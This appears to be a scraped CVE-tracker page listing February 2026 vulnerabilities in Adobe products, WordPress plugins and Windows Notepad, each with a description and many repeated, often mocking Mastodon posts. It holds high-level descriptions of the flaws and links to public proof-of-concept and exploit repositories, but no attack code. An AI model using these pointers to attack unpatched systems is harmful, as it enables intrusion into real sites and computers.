#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21324
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-11T17:36:45.697000

2 posts

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:12:37.000Z ##

🟠 CVE-2026-21324 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:12:37.000Z ##

🟠 CVE-2026-21324 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21328
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-11T17:35:50.863000

2 posts

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:16:14.000Z ##

🟠 CVE-2026-21328 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:16:14.000Z ##

🟠 CVE-2026-21328 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21343
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-11T17:16:03.557000

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T23:02:37.000Z ##

🟠 CVE-2026-21343 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:02:37.000Z ##

🟠 CVE-2026-21343 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21346
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-11T17:15:14.187000

2 posts

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T22:16:13.000Z ##

🟠 CVE-2026-21346 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T22:16:13.000Z ##

🟠 CVE-2026-21346 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1235
(6.5 MEDIUM)

EPSS: 0.01%

updated 2026-02-11T16:16:03.583000

1 posts

The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via ajax actions, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

offseq at 2026-02-11T07:30:29.651Z ##

🚨 CVE-2026-1235: CRITICAL deserialization flaw in WP eCommerce (≤3.15.1) allows unauthenticated PHP object injection via AJAX. No patch yet. Disable vulnerable AJAX actions & audit plugins. High risk for EU e-commerce sites. radar.offseq.com/threat/cve-20

##

CVE-2026-20841
(8.8 HIGH)

EPSS: 0.08%

updated 2026-02-11T15:16:16.997000

100 posts

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.

3 repos

https://github.com/BTtea/CVE-2026-20841-PoC

https://github.com/RajaUzairAbdullah/CVE-2026-20841

https://github.com/tangent65536/CVE-2026-20841

0xCDE at 2026-02-11T18:18:41.053Z ##

@mttaggart for those utilizing MS defender stack here is a detection for it:
github.com/0x-cde/Threat-Hunti

##

jbz@indieweb.social at 2026-02-11T18:12:01.000Z ##

⚠️ Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network

cve.org/CVERecord?id=CVE-2026-

#notepad #CVE202620841 #cybersecurity

##

mastokukei@social.josko.org at 2026-02-11T18:02:00.000Z ##

moves.
- TikTok launches opt-in Local Feed in the US using precise location data.
- Windows Notepad remote code execution vulnerability CVE-2026-20841.
- Europe’s hypersonic program: Mach 6 test completed in Norway as defense autonomy advances. [2/2]

##

winbuzzer@mastodon.social at 2026-02-11T17:31:48.000Z ##

winbuzzer.com/2026/02/11/micro

Microsoft Patches High-Severity Notepad Remote Code Execution Flaw

#Cybersecurity #MicrosoftNotepad #Microsoft #Windows #MicrosoftWindows #Windows11 #PatchTuesday #SecurityPatches #WindowsVulnerability #Vulnerability

##

mttaggart at 2026-02-11T17:17:40.949Z ##

Here's my CVE-2026-20841 PoC.

(Not really, but I have a feeling it's something that rhymes with this)

##

khalidabuhakmeh@mastodon.social at 2026-02-11T17:11:56.000Z ##

The Vibe-coding Era at Microsoft is going greaaaaaaaat.... msrc.microsoft.com/update-guid

##

gwire@mastodon.social at 2026-02-11T16:32:29.000Z ##

Looks like the vibe coders at Microsoft forgot to add "don't introduce command injection vulnerabilities" to their prompts?

cve.org/CVERecord?id=CVE-2026-

##

gomoot@mastodon.uno at 2026-02-11T15:03:30.000Z ##

🔥 Notepad colpito da vulnerabilità critica
Notepad in Windows 11 espone milioni di PC a un attacco remoto: la vulnerabilità CVE-2026-20841 sfrutta il supporto Markdown per eseguire codice malevolo con un semplice clic su un link

gomoot.com/notepad-di-windows-

#news #notepad #sicurezza #tech

##

newsyc500@toot.community at 2026-02-11T14:53:27.000Z ##

Windows Notepad App Remote Code Execution Vulnerability: cve.org/CVERecord?id=CVE-2026-

Discussion: news.ycombinator.com/item?id=4

##

hn500@social.lansky.name at 2026-02-11T14:50:15.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

dallo@pouet.chapril.org at 2026-02-11T14:43:34.000Z ##

Imagine being jail to an operating system where even the blast editor is vulnerable

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.

cve.org/CVERecord?id=CVE-2026-

Keep contributing and funding alternatives for all of us.

#windows #linux #foss #infosec #opensource

##

rasur@mastodon.social at 2026-02-11T14:18:44.000Z ##

cve.org/CVERecord?id=CVE-2026-

##

lrosa@mastodon.uno at 2026-02-11T13:15:46.000Z ##

Notepad++: alcune mie versioni erano vulnerabili

MS Notepad: hold my beer

msrc.microsoft.com/update-guid

##

lobsters@mastodon.social at 2026-02-11T12:50:13.000Z ##

Windows Notepad App Remote Code Execution Vulnerability lobste.rs/s/kp7jlq #windows
cve.org/CVERecord?id=CVE-2026-

##

pa3weg@mastodon.social at 2026-02-11T12:49:55.000Z ##

Remote Code Execution on notepad
FUCKING NOTEPAD

Microsoft, keep your claws out of the working code! Notepad does NOT need upgrades to be anything else than an entirely plain text editor.

msrc.microsoft.com/update-guid

##

jon@cyberdeck.social at 2026-02-11T12:24:54.000Z ##

Just A+ work all around.

"Windows Notepad App Remote Code Execution Vulnerability"

cve.org/CVERecord?id=CVE-2026-

##

manualdousuario@mastodon.social at 2026-02-11T11:49:20.000Z ##

Falha crítica no Bloco de notas (CVE-2026-20841). Um invasor poderia colocar um link malicioso em um arquivo Markdown que, ao ser clicado pela vítima, executaria códigos remotamente. Quem mandou macular a simplicidade do Bloco de notas? Já tem correção disponível. cve.org/CVERecord?id=CVE-2026-

##

newsyc300@toot.community at 2026-02-11T11:43:23.000Z ##

Windows Notepad App Remote Code Execution Vulnerability: cve.org/CVERecord?id=CVE-2026-

Discussion: news.ycombinator.com/item?id=4

##

tux0r@layer8.space at 2026-02-11T11:26:42.000Z ##

1976:
In fünfzig Jahren werden wir fliegende Autos haben.

2026:
Schwere Sicherheitslücke in ... Notepad.

msrc.microsoft.com/update-guid

##

maksimushka@mastodon.ml at 2026-02-11T11:25:30.000Z ##

Что ни день, то повод посмеяться над микрослопом.

Была обнаружена уязвимость, которая позволяет злоумышленникам запускать произвольный код на компьютере жертвы через БЛОКНОТ, сука. Серьёзность уязвимости помечена как ВЫСОКАЯ

cve.org/CVERecord?id=CVE-2026-

##

newsyc250@toot.community at 2026-02-11T11:03:20.000Z ##

Windows Notepad App Remote Code Execution Vulnerability: cve.org/CVERecord?id=CVE-2026-

Discussion: news.ycombinator.com/item?id=4

##

hn250@social.lansky.name at 2026-02-11T11:00:12.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

FlohEinstein@chaos.social at 2026-02-11T10:59:27.000Z ##

Notepad.exe RCE Vulnerability 8.8
Are you shitting me?

cve.org/CVERecord?id=CVE-2026-

#cve202620841 #notepad #windows #rce #infosec

##

newsyc200@toot.community at 2026-02-11T10:23:20.000Z ##

Windows Notepad App Remote Code Execution Vulnerability: cve.org/CVERecord?id=CVE-2026-

Discussion: news.ycombinator.com/item?id=4

##

markrimmel@metalhead.club at 2026-02-11T10:08:13.000Z ##

Notepad... NOTEPAD!

CVE Record: CVE-2026-20841

cve.org/CVERecord?id=CVE-2026-

##

tony@hoyle.me.uk at 2026-02-11T09:36:40.000Z ##

What the.. how?

Notepad was the simplest application on windows. What have they done to it?

cve.org/CVERecord?id=CVE-2026-

##

andyprice@mastodon.social at 2026-02-11T09:34:39.000Z ##

Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad

cve.org/CVERecord?id=CVE-2026-

##

hn100@social.lansky.name at 2026-02-11T09:15:09.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

vowe@social.heise.de at 2026-02-11T09:13:12.000Z ##

Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.

cve.org/CVERecord?id=CVE-2026-

#copilot #clippy

##

obivan at 2026-02-11T09:12:25.926Z ##

Notepad RCE? cvefeed.io/vuln/detail/CVE-202

##

_aD@hachyderm.io at 2026-02-11T09:04:49.000Z ##

lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.

plus remote code execution in fucking Notepad.

msrc.microsoft.com/update-guid

#slop

##

mastokukei@social.josko.org at 2026-02-11T09:02:11.000Z ##

age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]

##

newsycombinator@framapiaf.org at 2026-02-11T09:00:04.000Z ##

Windows Notepad App Remote Code Execution Vulnerability
Link: cve.org/CVERecord?id=CVE-2026-
Comments: news.ycombinator.com/item?id=4

##

iamkonstantin@mastodon.social at 2026-02-11T08:54:05.000Z ##

lol

Windows Notepad App Remote Code Execution Vulnerability

cve.org/CVERecord?id=CVE-2026-

##

hacker_news_bot@mastodon.social at 2026-02-11T08:50:05.000Z ##

📜 Latest Top Story on #HackerNews: Windows Notepad App Remote Code Execution Vulnerability
🔍 Original Story: cve.org/CVERecord?id=CVE-2026-
👤 Author: riffraff
⭐ Score: 63
💬 Number of Comments: 12
🕒 Posted At: 2026-02-11 06:15:33 UTC
🔗 URL: news.ycombinator.com/item?id=4
#news #hackernewsbot #bot #hackernews

##

hn50@social.lansky.name at 2026-02-11T08:45:07.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

sebsauvage@framapiaf.org at 2026-02-11T08:37:24.000Z ##

#Windows #sécurité
Oh misère, y'a même des failles RCE dans le Notepad de Windows ???
cve.org/CVERecord?id=CVE-2026-

##

hnbot@chrispelli.fun at 2026-02-11T08:26:00.000Z ##

Windows Notepad App Remote Code Execution Vulnerability - cve.org/CVERecord?id=CVE-2026-

#hackernews

##

h4ckernews@mastodon.social at 2026-02-11T08:25:13.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

cve.org/CVERecord?id=CVE-2026-

#HackerNews

##

CuratedHackerNews@mastodon.social at 2026-02-11T08:22:05.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

cve.org/CVERecord?id=CVE-2026-

#windows

##

serriadh@treehouse.systems at 2026-02-11T08:18:14.000Z ##

Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to “Windows Notepad App Remote Code Execution Vulnerability”.

msrc.microsoft.com/update-guid

##

tess@mastodon.social at 2026-02-11T07:56:05.000Z ##

Microsoft: I have made Notepad✨

Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.

cve.org/CVERecord?id=CVE-2026-

##

pheonix@hachyderm.io at 2026-02-11T07:23:33.000Z ##

They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.

This CVE is an 8.8 severity RCE in Notepad of all things lmao.

Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.

We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? 😭

msrc.microsoft.com/update-guid

#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology

##

Stomata@procial.tchncs.de at 2026-02-11T07:13:13.395Z ##

What is it, Microsoft shited their pants again lol ​:neofox_laugh_tears:​
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
Even this page didn't load properly
​:neofox_laugh_tears:​
#Microsoft #windows

##

Erpel@hai.z0ne.social at 2026-02-11T07:00:14.284Z ##

@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.

Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841

##

kboyd@phpc.social at 2026-02-11T03:35:15.000Z ##

microsoft: we have made a new notepad.exe

everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.

cve.org/CVERecord?id=CVE-2026-

##

alex@smith.geek.nz at 2026-02-11T01:55:42.000Z ##

CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability

"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."

lolwut

msrc.microsoft.com/update-guid

##

legacv at 2026-02-11T01:08:06.188Z ##

someone earlier today said "RCE in Notepad" and i was like "haha funny" and then someone ELSE said RCE in Notepad and then i was like youve gotta be fucking kidding me

##

AKK666@mastodon.social at 2026-02-11T00:42:55.000Z ##

Kein Kommentar. Wäre nicht zitierfähig. Aber...
RCE im Notizblock?! Wie verstrahlt- uhm "vibed" ist das denn?!

msrc.microsoft.com/update-guid

##

delta_vee@mstdn.ca at 2026-02-11T00:38:32.000Z ##

cve.org/CVERecord?id=CVE-2026-

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.

Notepad

over a network

##

adwright@mastodon.social at 2026-02-11T00:36:55.000Z ##

Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.

cve.org/CVERecord?id=CVE-2026-

It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.

##

davidgerard@circumstances.run at 2026-02-11T00:32:39.000Z ##

RE: tech.lgbt/@solonovamax/1160491

cve.org/CVERecord?id=CVE-2026-

WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD

WHAT BIT COULD IT BEEEEEEEE

edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.

##

lmorchard@masto.hackers.town at 2026-02-11T00:20:55.000Z ##

"Windows Notepad App Remote Code Execution Vulnerability"

That's it: I'm going back to AppleWorks, on my Apple IIe.

msrc.microsoft.com/update-guid

##

solonovamax@tech.lgbt at 2026-02-11T00:16:25.000Z ##

CVE-2026-20841

##

sandro@c3d2.social at 2026-02-11T00:11:53.000Z ##

@m4rc3l CVE-2026-20841 #c3d2leaks

##

bontchev at 2026-02-10T22:33:25.824Z ##

From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)

msrc.microsoft.com/update-guid

##

decalage@mastodon.social at 2026-02-10T20:43:06.000Z ##

A vulnerability in Notepad 🤦‍♂️
msrc.microsoft.com/update-guid

##

0xCDE@infosec.exchange at 2026-02-11T18:18:41.000Z ##

@mttaggart for those utilizing MS defender stack here is a detection for it:
github.com/0x-cde/Threat-Hunti

##

jbz@indieweb.social at 2026-02-11T18:12:01.000Z ##

⚠️ Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network

cve.org/CVERecord?id=CVE-2026-

#notepad #CVE202620841 #cybersecurity

##

winbuzzer@mastodon.social at 2026-02-11T17:31:48.000Z ##

winbuzzer.com/2026/02/11/micro

Microsoft Patches High-Severity Notepad Remote Code Execution Flaw

#Cybersecurity #MicrosoftNotepad #Microsoft #Windows #MicrosoftWindows #Windows11 #PatchTuesday #SecurityPatches #WindowsVulnerability #Vulnerability

##

mttaggart@infosec.exchange at 2026-02-11T17:17:40.000Z ##

Here's my CVE-2026-20841 PoC.

(Not really, but I have a feeling it's something that rhymes with this)

##

khalidabuhakmeh@mastodon.social at 2026-02-11T17:11:56.000Z ##

The Vibe-coding Era at Microsoft is going greaaaaaaaat.... msrc.microsoft.com/update-guid

##

gomoot@mastodon.uno at 2026-02-11T15:03:30.000Z ##

🔥 Notepad colpito da vulnerabilità critica
Notepad in Windows 11 espone milioni di PC a un attacco remoto: la vulnerabilità CVE-2026-20841 sfrutta il supporto Markdown per eseguire codice malevolo con un semplice clic su un link

gomoot.com/notepad-di-windows-

#news #notepad #sicurezza #tech

##

hn500@social.lansky.name at 2026-02-11T14:50:15.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

dallo@pouet.chapril.org at 2026-02-11T14:43:34.000Z ##

Imagine being jail to an operating system where even the blast editor is vulnerable

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.

cve.org/CVERecord?id=CVE-2026-

Keep contributing and funding alternatives for all of us.

#windows #linux #foss #infosec #opensource

##

lobsters@mastodon.social at 2026-02-11T12:50:13.000Z ##

Windows Notepad App Remote Code Execution Vulnerability lobste.rs/s/kp7jlq #windows
cve.org/CVERecord?id=CVE-2026-

##

pa3weg@mastodon.social at 2026-02-11T12:49:55.000Z ##

Remote Code Execution on notepad
FUCKING NOTEPAD

Microsoft, keep your claws out of the working code! Notepad does NOT need upgrades to be anything else than an entirely plain text editor.

msrc.microsoft.com/update-guid

##

jon@cyberdeck.social at 2026-02-11T12:24:54.000Z ##

Just A+ work all around.

"Windows Notepad App Remote Code Execution Vulnerability"

cve.org/CVERecord?id=CVE-2026-

##

manualdousuario@mastodon.social at 2026-02-11T11:49:20.000Z ##

Falha crítica no Bloco de notas (CVE-2026-20841). Um invasor poderia colocar um link malicioso em um arquivo Markdown que, ao ser clicado pela vítima, executaria códigos remotamente. Quem mandou macular a simplicidade do Bloco de notas? Já tem correção disponível. cve.org/CVERecord?id=CVE-2026-

##

tux0r@layer8.space at 2026-02-11T11:26:42.000Z ##

1976:
In fünfzig Jahren werden wir fliegende Autos haben.

2026:
Schwere Sicherheitslücke in ... Notepad.

msrc.microsoft.com/update-guid

##

maksimushka@mastodon.ml at 2026-02-11T11:25:30.000Z ##

Что ни день, то повод посмеяться над микрослопом.

Была обнаружена уязвимость, которая позволяет злоумышленникам запускать произвольный код на компьютере жертвы через БЛОКНОТ, сука. Серьёзность уязвимости помечена как ВЫСОКАЯ

cve.org/CVERecord?id=CVE-2026-

##

hn250@social.lansky.name at 2026-02-11T11:00:12.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

FlohEinstein@chaos.social at 2026-02-11T10:59:27.000Z ##

Notepad.exe RCE Vulnerability 8.8
Are you shitting me?

cve.org/CVERecord?id=CVE-2026-

#cve202620841 #notepad #windows #rce #infosec

##

markrimmel@metalhead.club at 2026-02-11T10:08:13.000Z ##

Notepad... NOTEPAD!

CVE Record: CVE-2026-20841

cve.org/CVERecord?id=CVE-2026-

##

tony@hoyle.me.uk at 2026-02-11T09:36:40.000Z ##

What the.. how?

Notepad was the simplest application on windows. What have they done to it?

cve.org/CVERecord?id=CVE-2026-

##

andyprice@mastodon.social at 2026-02-11T09:34:39.000Z ##

Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad

cve.org/CVERecord?id=CVE-2026-

##

hn100@social.lansky.name at 2026-02-11T09:15:09.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

vowe@social.heise.de at 2026-02-11T09:13:12.000Z ##

Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.

cve.org/CVERecord?id=CVE-2026-

#copilot #clippy

##

obivan@infosec.exchange at 2026-02-11T09:12:25.000Z ##

Notepad RCE? cvefeed.io/vuln/detail/CVE-202

##

_aD@hachyderm.io at 2026-02-11T09:04:49.000Z ##

lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.

plus remote code execution in fucking Notepad.

msrc.microsoft.com/update-guid

#slop

##

newsycombinator@framapiaf.org at 2026-02-11T09:00:04.000Z ##

Windows Notepad App Remote Code Execution Vulnerability
Link: cve.org/CVERecord?id=CVE-2026-
Comments: news.ycombinator.com/item?id=4

##

iamkonstantin@mastodon.social at 2026-02-11T08:54:05.000Z ##

lol

Windows Notepad App Remote Code Execution Vulnerability

cve.org/CVERecord?id=CVE-2026-

##

hn50@social.lansky.name at 2026-02-11T08:45:07.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

Link: cve.org/CVERecord?id=CVE-2026-
Discussion: news.ycombinator.com/item?id=4

##

sebsauvage@framapiaf.org at 2026-02-11T08:37:24.000Z ##

#Windows #sécurité
Oh misère, y'a même des failles RCE dans le Notepad de Windows ???
cve.org/CVERecord?id=CVE-2026-

##

h4ckernews@mastodon.social at 2026-02-11T08:25:13.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

cve.org/CVERecord?id=CVE-2026-

#HackerNews

##

CuratedHackerNews@mastodon.social at 2026-02-11T08:22:05.000Z ##

Windows Notepad App Remote Code Execution Vulnerability

cve.org/CVERecord?id=CVE-2026-

#windows

##

serriadh@treehouse.systems at 2026-02-11T08:18:14.000Z ##

Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to “Windows Notepad App Remote Code Execution Vulnerability”.

msrc.microsoft.com/update-guid

##

tess@mastodon.social at 2026-02-11T07:56:05.000Z ##

Microsoft: I have made Notepad✨

Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.

cve.org/CVERecord?id=CVE-2026-

##

pheonix@hachyderm.io at 2026-02-11T07:23:33.000Z ##

They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.

This CVE is an 8.8 severity RCE in Notepad of all things lmao.

Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.

We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? 😭

msrc.microsoft.com/update-guid

#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology

##

Erpel@hai.z0ne.social at 2026-02-11T07:00:14.284Z ##

@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.

Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841

##

kboyd@phpc.social at 2026-02-11T03:35:15.000Z ##

microsoft: we have made a new notepad.exe

everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.

cve.org/CVERecord?id=CVE-2026-

##

alex@smith.geek.nz at 2026-02-11T01:55:42.000Z ##

CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability

"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."

lolwut

msrc.microsoft.com/update-guid

##

delta_vee@mstdn.ca at 2026-02-11T00:38:32.000Z ##

cve.org/CVERecord?id=CVE-2026-

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.

Notepad

over a network

##

adwright@mastodon.social at 2026-02-11T00:36:55.000Z ##

Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.

cve.org/CVERecord?id=CVE-2026-

It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.

##

davidgerard@circumstances.run at 2026-02-11T00:32:39.000Z ##

RE: tech.lgbt/@solonovamax/1160491

cve.org/CVERecord?id=CVE-2026-

WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD

WHAT BIT COULD IT BEEEEEEEE

edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.

##

lmorchard@masto.hackers.town at 2026-02-11T00:20:55.000Z ##

"Windows Notepad App Remote Code Execution Vulnerability"

That's it: I'm going back to AppleWorks, on my Apple IIe.

msrc.microsoft.com/update-guid

##

solonovamax@tech.lgbt at 2026-02-11T00:16:25.000Z ##

CVE-2026-20841

##

sandro@c3d2.social at 2026-02-11T00:11:53.000Z ##

@m4rc3l CVE-2026-20841 #c3d2leaks

##

bontchev@infosec.exchange at 2026-02-10T22:33:25.000Z ##

From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)

msrc.microsoft.com/update-guid

##

decalage@mastodon.social at 2026-02-10T20:43:06.000Z ##

A vulnerability in Notepad 🤦‍♂️
msrc.microsoft.com/update-guid

##

CVE-2026-1560
(8.8 HIGH)

EPSS: 0.24%

updated 2026-02-11T09:30:25

1 posts

The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.0 via multiple functions in the 'LazyBlocks_Blocks' class. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.

1 repos

https://github.com/Z3YR0xX/CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

offseq at 2026-02-11T09:00:32.173Z ##

⚠️ HIGH severity: CVE-2026-1560 in Lazy Blocks (WordPress, ≤4.2.0) lets Contributor+ users run arbitrary code via improper code generation (CWE-94). No public exploits yet — restrict roles and monitor activity! radar.offseq.com/threat/cve-20

##

CVE-2026-1357
(9.8 CRITICAL)

EPSS: 0.46%

updated 2026-02-11T06:30:48

2 posts

The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Upload in versions up to and including 0.9.123. This is due to improper error handling in the RSA decryption process combined with a lack of path sanitization when writing uploaded files. When the plugin fails to decrypt a session key using openssl_private_decrypt(), it

2 repos

https://github.com/itsismarcos/Exploit-CVE-2026-1357

https://github.com/LucasM0ntes/POC-CVE-2026-1357

offseq at 2026-02-11T06:00:29.985Z ##

🚨 CRITICAL: CVE-2026-1357 impacts WPvivid Backup & Migration (all versions). Unauthenticated file upload via directory traversal enables RCE. Disable plugin or restrict access immediately! radar.offseq.com/threat/cve-20

##

wordfence@mastodon.social at 2026-02-10T19:27:51.000Z ##

